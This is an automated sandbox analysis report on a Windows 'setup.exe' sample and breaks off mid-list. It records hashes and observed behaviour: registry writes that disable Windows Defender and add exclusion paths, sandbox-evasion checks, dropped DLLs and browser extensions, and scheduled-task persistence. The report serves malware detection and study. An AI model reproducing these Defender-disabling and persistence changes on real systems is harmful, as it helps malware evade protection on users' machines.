Analysis
-
max time kernel
84s -
max time network
87s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28-04-2024 20:50
Static task
static1
Behavioral task
behavioral1
Sample
setup.exe
Resource
win7-20240221-en
General
-
Target
setup.exe
-
Size
6.3MB
-
MD5
a63018cc078f57c640ac2ec8ed84dead
-
SHA1
1f5c17894a755114527e92304f4a74195c48031d
-
SHA256
41d01d8fc610b6ceb17687c58973ee8f6a7bbdc1eb6deb19297e3f4c4c62b558
-
SHA512
a42f522745bbe8b36ea60d7688a713bce89df2f7b0f5c7ad7b32bc43989fca71e00d817692263ea4004ad6be23e64dd9d3d2f1dfbe7b5038cf4b79b7064a9864
-
SSDEEP
196608:91OaXf1Vgw0Q2GekhBTUpKiTOZ5FrrOhU+3:3OaXf1Gwbek/QKis5FO33
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\pICeQFkDCDDquYVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nlcUipsDcFbdntMB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nlcUipsDcFbdntMB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zgoZGMcaU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nlcUipsDcFbdntMB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zgoZGMcaU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\pICeQFkDCDDquYVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\epoBtGYzqLvU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ecOJmsgAHWlsC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qIYKRzUEasUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ecOJmsgAHWlsC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\epoBtGYzqLvU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qIYKRzUEasUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nlcUipsDcFbdntMB = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 24 1624 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
PnoMheo.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\International\Geo\Nation PnoMheo.exe -
Executes dropped EXE 3 IoCs
Processes:
Install.exebEaZhrS.exePnoMheo.exepid process 2564 Install.exe 744 bEaZhrS.exe 1408 PnoMheo.exe -
Loads dropped DLL 8 IoCs
Processes:
setup.exeInstall.exerundll32.exepid process 2872 setup.exe 2564 Install.exe 2564 Install.exe 2564 Install.exe 1624 rundll32.exe 1624 rundll32.exe 1624 rundll32.exe 1624 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
PnoMheo.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json PnoMheo.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json PnoMheo.exe -
Drops file in System32 directory 27 IoCs
Processes:
bEaZhrS.exepowershell.EXEPnoMheo.exepowershell.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol bEaZhrS.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA PnoMheo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 PnoMheo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PnoMheo.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini bEaZhrS.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PnoMheo.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 PnoMheo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol PnoMheo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F PnoMheo.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol bEaZhrS.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 PnoMheo.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini bEaZhrS.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA PnoMheo.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat PnoMheo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 PnoMheo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F PnoMheo.exe -
Drops file in Program Files directory 13 IoCs
Processes:
PnoMheo.exedescription ioc process File created C:\Program Files (x86)\ecOJmsgAHWlsC\IPQibPe.dll PnoMheo.exe File created C:\Program Files (x86)\epoBtGYzqLvU2\anNkRfKBGLUxv.dll PnoMheo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi PnoMheo.exe File created C:\Program Files (x86)\epoBtGYzqLvU2\rKINsXm.xml PnoMheo.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\gPgMiZl.dll PnoMheo.exe File created C:\Program Files (x86)\zgoZGMcaU\nkfBLx.dll PnoMheo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja PnoMheo.exe File created C:\Program Files (x86)\zgoZGMcaU\QRxtNkk.xml PnoMheo.exe File created C:\Program Files (x86)\ecOJmsgAHWlsC\UYwsIhp.xml PnoMheo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi PnoMheo.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\brmtqfz.xml PnoMheo.exe File created C:\Program Files (x86)\qIYKRzUEasUn\MOkeikY.dll PnoMheo.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PnoMheo.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job schtasks.exe File created C:\Windows\Tasks\yfARWRprRqUFWeTGf.job schtasks.exe File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job schtasks.exe File created C:\Windows\Tasks\aNyMQclguOCSCcjxm.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2448 schtasks.exe 844 schtasks.exe 980 schtasks.exe 1724 schtasks.exe 1444 schtasks.exe 3016 schtasks.exe 2260 schtasks.exe 612 schtasks.exe 2076 schtasks.exe 2352 schtasks.exe 3008 schtasks.exe 1852 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
PnoMheo.exerundll32.exebEaZhrS.exepowershell.exepowershell.exewscript.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs PnoMheo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-e8-0c-d8-7f-16 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs PnoMheo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" bEaZhrS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople PnoMheo.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00cc56afad99da01 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{39FFD7B2-9DA2-4408-9725-386077F80865}\WpadDecision = "0" PnoMheo.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-e8-0c-d8-7f-16\WpadDecisionTime = a00c3ed8ad99da01 PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ bEaZhrS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached bEaZhrS.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates PnoMheo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-e8-0c-d8-7f-16\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{39FFD7B2-9DA2-4408-9725-386077F80865} PnoMheo.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{39FFD7B2-9DA2-4408-9725-386077F80865}\WpadNetworkName = "Network 3" PnoMheo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs PnoMheo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{39FFD7B2-9DA2-4408-9725-386077F80865}\12-e8-0c-d8-7f-16 PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0107000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs PnoMheo.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot PnoMheo.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 PnoMheo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-e8-0c-d8-7f-16\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" PnoMheo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-e8-0c-d8-7f-16\WpadDecision = "0" PnoMheo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates PnoMheo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates PnoMheo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA PnoMheo.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEpowershell.exePnoMheo.exepowershell.exepowershell.exepid process 2396 powershell.exe 2396 powershell.exe 2396 powershell.exe 1456 powershell.exe 2232 powershell.exe 2232 powershell.exe 2232 powershell.exe 3000 powershell.EXE 3000 powershell.EXE 3000 powershell.EXE 1740 powershell.EXE 1740 powershell.EXE 1740 powershell.EXE 2856 powershell.exe 1036 powershell.EXE 1036 powershell.EXE 1036 powershell.EXE 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 2200 powershell.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1508 powershell.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe 1408 PnoMheo.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeWMIC.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEpowershell.exepowershell.exeWMIC.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeIncreaseQuotaPrivilege 1800 WMIC.exe Token: SeSecurityPrivilege 1800 WMIC.exe Token: SeTakeOwnershipPrivilege 1800 WMIC.exe Token: SeLoadDriverPrivilege 1800 WMIC.exe Token: SeSystemProfilePrivilege 1800 WMIC.exe Token: SeSystemtimePrivilege 1800 WMIC.exe Token: SeProfSingleProcessPrivilege 1800 WMIC.exe Token: SeIncBasePriorityPrivilege 1800 WMIC.exe Token: SeCreatePagefilePrivilege 1800 WMIC.exe Token: SeBackupPrivilege 1800 WMIC.exe Token: SeRestorePrivilege 1800 WMIC.exe Token: SeShutdownPrivilege 1800 WMIC.exe Token: SeDebugPrivilege 1800 WMIC.exe Token: SeSystemEnvironmentPrivilege 1800 WMIC.exe Token: SeRemoteShutdownPrivilege 1800 WMIC.exe Token: SeUndockPrivilege 1800 WMIC.exe Token: SeManageVolumePrivilege 1800 WMIC.exe Token: 33 1800 WMIC.exe Token: 34 1800 WMIC.exe Token: 35 1800 WMIC.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 3000 powershell.EXE Token: SeDebugPrivilege 1740 powershell.EXE Token: SeDebugPrivilege 2856 powershell.exe Token: SeAssignPrimaryTokenPrivilege 272 WMIC.exe Token: SeIncreaseQuotaPrivilege 272 WMIC.exe Token: SeSecurityPrivilege 272 WMIC.exe Token: SeTakeOwnershipPrivilege 272 WMIC.exe Token: 